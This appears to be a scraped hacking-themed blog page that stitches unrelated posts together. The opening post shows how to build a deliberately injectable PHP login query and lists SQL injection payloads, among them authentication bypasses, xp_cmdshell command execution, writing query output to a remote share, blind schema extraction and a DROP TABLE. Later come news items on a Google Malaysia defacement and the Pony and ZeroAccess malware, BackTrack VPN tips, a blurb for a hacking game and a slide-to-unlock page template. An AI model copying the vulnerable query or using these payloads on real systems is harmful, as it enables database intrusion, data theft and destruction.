Background

Background

Change your prefer background

  • image1
  • image2
  • image3
  • image4
  • image2
  • image1
  • image4
  • image3
Showing posts with label education. Show all posts
Showing posts with label education. Show all posts

Just run the simplest unprotected query:
$query = "SELECT * FROM users WHERE username = ".stripslashes($_POST['username'])." AND password = ".stripslashes($_POST['password'])
and enjoy! The stripslashes() part is there in case you haven't magic_quotes already disabled (as it should be), to avoid some automatic escaping; otherwise you'll have purest injectable input, just pick up any sql injection you might find on the internet and see. Some example:
' or 1=1--
' or 1--
' or 1
\" or '1'
' or 1=1--
' OR ''='
' or 'a'='a
') or ('a'='a
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'; EXEC master..sp_makewebtask \"\\10.10.1.3\share\output.html\", \"SELECT * FROM INFORMATION_SCHEMA.TABLES\"",
10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='
' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
1;DROP TABLE `users`
In the Following Issue we will discuss the impacted vulnerability, their particular information and details, proof-of-concept code, as well as their special recommendations, regarding fixing those issues.
Security researchers of the High-Profile websites, mostly discover their related vulnerabilities as the highly effective zones. Nicholas Lemonias is an expert researcher, and he is of the belief that such un-favorable and flaws, could actually pose a considerably bigger threat, than what most people may assume.
He is the researcher behind reporting vulnerabilities in Adobe, Cisco, eBay, Microsoft and Nokia.
While explaining the scenario Lemonias said that:
  • “In a PCI-DSS and ISO 27001 compatible environment such type of vulnerabilities and flaws could actually become serious troubles. The threat of Cyber warfare expansion, due to the occurrence of such kinds of bugs, on massive stock exchange actors and prominent US stakeholders is foreseeable, as we previously experienced in noteworthy cases for example: Stuxnet and Dugu.”
In a way it could also impact the National Economy, and the US and international Stock exchange market, in case if the protection barriers are not scaled. If a threat arises of further attacks on this scale, cross-site scripting bugs may as well serve as, the core ingredient for another extension of malware transmission, to systems of strategic as well as political significance.
Lemonias further added that, the key factor towards solving the issue is to implement the right kind of security metrics right from the beginning. There is a dire need that security policies are created, so that the vulnerabilities are caught at the primary stage. Intrusion detection and Prevention systems, can also make a huge difference.
As far as Government involvement in the issue is concerned, Lemonias also highlighted this aspect in one of his recent academic papers that there must be “a complete harmony between government intervention and user democratic equality.”
  • “There ideally should be a choice for users, to decide and opt for and assent their online censorship, rather democratically and also what is needed is an assertion, to what degree. However, the parliament should not be an obstruction, to the online legislation, which would just be too invasive, and likely to create major moral and ethical conflicts.” As he further argued in his paper.
There has been quite a stir lately, about government cyber warfare and privacy violations. Nevertheless, the expert believes that, there must be a sound solution to this issue, to make both sides content.
Lemonias further noted that “I am not a supporter of government intervention, to a user’s privacy, although in some instances the issue of cyber warfare is impending, and security and democracy are keys to solving this enigma.”
Lemonias went on to add that, “Technological advancements should assist, in fostering human, social and cultural progression, as well as also democracy without distressing a user’s liberty- this is the reason, why security should go parallel to democracy, also in cases of cyber warfare.”
Lemonias further added that:
  • “The above mentioned problems, and related experiments were conducted in a contrived laboratory setting, and they also reflect live statistical methods, and real practical experimentation. The results have been tried and tested and proven valid, and accurate. The innovative and revolutionary technology suggests, very adaptable levels of function and interoperability.”



Hey faithful readers and people interested in Internet Security! Enjoy our September issue packed full of computer security issues and a great interview with a young hacker who defines the world of hacking and the future. Let us know what you think and many thanks for following our website! 
This magazine is free to download . Grab it and take it and read it.



 Video : Source-- hacking-lab.com

please watch vpn movie with backtrack

http://media.hacking-lab.com/movies/vpnbacktrack/

USER PROBLEMS WITH BACKTRACK

-> dns is not properly assigned
-> pls. test if /etc/resolv.conf points to 192.168.200.203 after vpn is established
-> without using dns names in HL most challenges won't work (virtual apache configs)

=========
Hi there, 

I’m new at your site , and I’m trying to get used to backtrack.
While the solution provided worked for me , my DNS settings kept changing back. 
i.e. the etc/resolv.conf file is overridden by the dhclient

This was bugging me , and I fixed it by editing /etc/dhclient.conf file and adding 
“Prepend domain-name-servers 192.168.200.193”

Don’t think this is the best solution  , but helps me out .

Maybe useful for other backtrack users as well .
Anayway keep up the good work !



Game : Source --http://www.slavehack.com/

Slavehack is a virtual hack simulation game. This game does not support or encourage hacking in any way, the game is just a lot of fun!

Start playing and defend your own virtual-pc against intruders while trying to hack as many other players and webservers as you can!
What is Slave hack ?
Slave Hack is an online hacking simulation game, Slave Hack is NOT related to any real hacking!
All in-game is virtual, everything is made up..like the IP ranges, software, warez etc.

OK I'm not afraid anymore - tell me about the features!
To start with the best: SH is a free game, you never need to show your credit card.
You start SH with a very old (133Mhz, 1gb harddisk) computer, you will need to gather some hack software quick or else you won't be able to defend yourself in this virtual world ! You can choose to live very defensive with as goal to collect good firewalls and live peacefully, or choose to collect powerful firewall-bypassers and password crackers to hack computers and make them your slaves.

These hacked computers (slaves) can be used to earn money or gain more power:
- Use them to send spam (Earn a few euros for every million emails).
- Sell warez (Illegally download one of the latest games and sell it online - Virtually, of course).
- DDoS and destroy an enemy computer.
- ...and more!

Slaves will do your bidding, BUT be sure to clean out your log files every now and then, otherwise your PC will be visited by some nasty admins very soon! You can also use logs in your advantage however - You can check logfiles of other VPC's to track any online transaction... and then what? Hack the bank account ;)!


Goal of the game: Gather the best software and hardware around and hack as much player computers and NPC servers as you can to earn a spot in the highscores.

News : Source -- Written by Niraj Kashyap

Google once again is #Hacked and #Defaced, this time the hack is done by Pakistani Hackers team, popularly known as”TeaM MADLEETS”.
The hackers have defaced both the domain  http://google.my/ and http://www.google.com.my/
Earlier Google Palestine was hacked and defaced by hacker known as Cold Z3ro. This time the hack is done by DNS poisoning and the name server of google Malaysia is changed to
  1. b0x4.madleets.com
  2. b0x3.madleets.com
We have attached two screenshots of google defacement

here is the details of google.com.my from who.is

Message by Hackers left on defaced google

Message! Google Malaysia STAMPED by PAKISTANI LEETS
We are TeaM MADLEETS
H4x0r HuSY – KhantastiC HaXor – H4x0rL1f3 – InvectuS – Shadow008 – r00x – Don – MindCracker – Dr.Z0mbie – phpBuGz – MaD GirL
MaDCoDe – Sn!p3r_GS – DeXter – Neo Haxor – Darksnipper – Pain006 – b0x – R3DL0F – Sahrawi – 3thicaln00b – Hmei7 – MakMan – Sniffer – AL.MaX HaCkEr – Ch3rn0by1
=======================
www.MaDLeeTs.com
| LeeTHaXor@Y7mail.com |
=======================
Pakistan Zindabad



Microsoft teamed up with law enforcement agencies and A10 Networks has disrupted one of the world's largest Botnet "ZeroAccess" that defrauded online advertisers.

ZeroAccess also known as Sirefef is a notorious malware which makes money for cyber criminals through Click fraud - Hijacking victim's search results and generating fake clicks on ads. It also installs Bitcoin miners in the infected machines.

Victims usually get infected by the ZeroAccess through drive by download attacks.

The malware has reportedly infected more than two million computers. It costs online advertisers around $2.7 million per month.

David Finn, executive director and associate general counsel of the Microsoft Digital Crimes Unit said the disruption "will stop victims’ computers from being used for fraud and help us identify the computers that need to be cleaned of the infection"

Microsoft said the action will not "fully eliminate the ZeroAccess botnet due to the complexity of the threat". However, it will significantly disrupt the botnet's operation and will bring loss of revenue for the cyber criminals who behind the ZeroAccess.

Tips : Source --  http://abcnews.go.com/
Any time you logged into Facebook, Google, Twitter, or a host of other popular web services the past month, there may have been a hacker peering over your digital shoulder, sneaking a peek at your password.
The information security company Trustwave has revealed that the passwords to 2 million different accounts have been compromised. The malware program Pony forwarded the vast majority of the passwords to a central server in the Netherlands.
John Miller, security research manager at Trustwave, said that the hack wasn't due to a flaw in any of those company's servers. "It was the individual users' computers that had the malware installed on their machine," he told ABC News. He adds that the unnamed hackers were most likely motivated by profit. "These passwords were never publicly posted. We can't say for sure, but [the hackers] were probably going to sell them."
Many of the services whose users were affected have already taken action. "They may not necessarily inform users with an email," said Miller. However, he adds that affected users will be asked to reset their password after logging into their account.
Trustwave analyzed the passwords that were compromised in the hack and saw some of the trends usually associated with bad password security. The most common password was 123456. In addition, nearly half of all passwords used a single character type, such as all lowercase letters or all numbers.
"For a better password, we recommend a mix of uppercase, lowercase, numbers, and special characters," said Miller. "We also recommend using longer passwords of 16 or more characters, as well as using different passwords on different websites."
But even the most secure password wouldn't have been safe from the Pony malware. To that end, Miller said to practice good browsing habits. "Keep your anti-virus software up to date and make sure your browsers are updated and patched to the latest version," he said.
And above all, don't click that suspicious looking link in your email. "Pony is sent through spam links," said Miller.

This Javascript source code can help people such as Website builder,editor,blogger and newbie to gain some knowledge how to put slide script like you see on your iPhone/iPod


Source Code:

<head>
    <meta charset='UTF-8'>
<title>Your Title Name</title>
<link rel='stylesheet' href='css/style.css'>    
<link rel="shortcut icon" href="{Favicon}">
<link rel="alternate" type="application/rss+xml" title="RSS" href="{RSS}" />

<link href='http://fonts.googleapis.com/css?family=Righteous' rel='stylesheet' type='text/css'> 
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js'></script>
<script src='http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/jquery-ui.min.js'></script>
    
<script src='js/slidetounlock.js'></script>
    


<meta name="text:New Username" content="NEW USERNAME"/>
<meta name="color:Link" content="#000000"/>
<meta name="color:Hover" content="#7FFF00"/>

<meta name="if:Show Navigation" content="1"/>

<center><br><br><br><br><br>
<ha><b>I'VE MOVED!</b></ha><br><br><br>
slide to unlock my new url
</center>

<style type="text/css">  

a:link, a:active, a:visited{ 
color: {color:Link};
text-decoration: none; 
-webkit-transition: 0.3s ease-in;


a:hover { 
color: {color:Hover};
-webkit-transition: 0.3s ease-in;
}  



iframe#tumblr_controls{
top: 0px !important;
margin: 0 0 0 0;
right: 0px !important;
position: fixed !important;
opacity: 0;
}
    
ha{
font: 50pt 'Righteous', cursive; !important; 
font-weight:normal; 
line-height:20px; 
margin:0px; 
color: rgba(0,0,0,0.6);

text-shadow:1px 1px 2px rgba(255,255,255,0.1);
-webkit-transition: all 0.4s ease-out;
-moz-transition: all 0.4s ease-out;
-o-transition: all 0.4s ease-out;}


h5{
font: 20pt 'Righteous', cursive; !important; 
font-weight:normal; 
line-height:20px; 
margin:0px; 
color: rgba(0,0,0,0.6);

text-shadow:1px 1px 2px rgba(255,255,255,0.1);
-webkit-transition: all 0.4s ease-out;
-moz-transition: all 0.4s ease-out;
-o-transition: all 0.4s ease-out;}


</style>    
</head><body>

<div id="page-wrap">

<div id="well">

<h2><strong id="slider"></strong><span>slide to unlock</span></h2>

</div>

</div>

<style type="text/css">
    
   /*
     CSS-Tricks Example
by Chris Coyier
http://css-tricks.com
*/

* { margin: 0; padding: 0; }
body { 
font: 15px Georgia, serif; 
background-image:url(http://static.tumblr.com/b8yqvki/2qGmal7sx/pattern9.jpg);
background-repeat: repeat;
background-attachment: fixed;
    min-height: 350px; 
    

}
#page-wrap { width: 720px; margin: 0 auto; padding-top: 50px; }

#well {
   padding: 14px 20px 20px 20px;
   -webkit-border-radius: 30px;
   -moz-border-radius: 30px;
   border-radius: 30px;
   
   background: -moz-linear-gradient(top, #010101, #181818);
   background: -webkit-gradient(linear,left top,left bottom,color-stop(0, #010101),color-stop(1, #181818));
   
   border: 2px solid #454545; 
   overflow: hidden; 
   
   -webkit-user-select: none;
}

h2 {
  background: -moz-linear-gradient(left, #4d4d4d, 0.4, #4d4d4d, 0.5, white, 0.6, #4d4d4d, #4d4d4d); 
  background: -webkit-gradient(linear,left top,right top,color-stop(0, #4d4d4d),color-stop(0.4, #4d4d4d),color-stop(0.5, white),color-stop(0.6, #4d4d4d),color-stop(1, #4d4d4d)); 
  
  -moz-background-clip: text;
  -webkit-background-clip: text;
  
  -moz-text-fill-color: transparent;
  -webkit-text-fill-color: transparent;
  
  -webkit-animation: slidetounlock 5s infinite;
  
  font-size: 80px;
  font-family: "HelveticaNeue-Light", "Helvetica Neue Light", "Helvetica Neue", Helvetica, Arial, "Lucida Grande", sans-serif;
  font-weight: 300;
  
  padding: 0;
  width: 200%;
  
  -webkit-text-size-adjust: none;
}
#slider {
    background: url("http://static.tumblr.com/b8yqvki/VLHmclr68/arrow.png") no-repeat;
width: 146px;
height: 98px;
display: inline-block;
vertical-align: middle;
line-height: 1;
}

@-webkit-keyframes slidetounlock {
0% {
background-position: -720px 0;
}
100%{
background-position: 720px 0;
}
}

.fontcolor{
 font-size: 50px;
 color:#ffffff;
}
</style>

<script type="text/javascript">

$(function() {

    $("#slider").draggable({
axis: 'x',
containment: 'parent',
drag: function(event, ui) {
if (ui.position.left > 550) {
window.location = "Your URL";
} else {
   // Apparently Safari isn't allowing partial opacity on text with background clip? Not sure.
// $("h2 span").css("opacity", 100 - (ui.position.left / 5))
}
},
stop: function(event, ui) {
if (ui.position.left < 550) {
$(this).animate({
left: 0
})
}
}
});


});

</script>

<center> <br><br><br> 
<u><a href="Your URL" title="{text:New Username}">click here if you are not redirect</a></u><br><br><br> 

<h5>
<a href="http://videostreamservice.blogspot.com/" title="refresh">S</a>
&nbsp;&nbsp;

<a href="http://videostreamservice.blogspot.com/" title="message">L</span></a>
&nbsp;&nbsp;

<a href="http://videostreamservice.blogspot.com/" title="install">I<a>
&nbsp;&nbsp;

<a href="http://videostreamservice.blogspot.com/" title="theme">D</a>
&nbsp;&nbsp;

<a href="http://videostreamservice.blogspot.com/" title="credit">E</span></a>
<h5>
</center>

</body></html>

DONE

Don't forget to change the URL because it will cause changing for your site.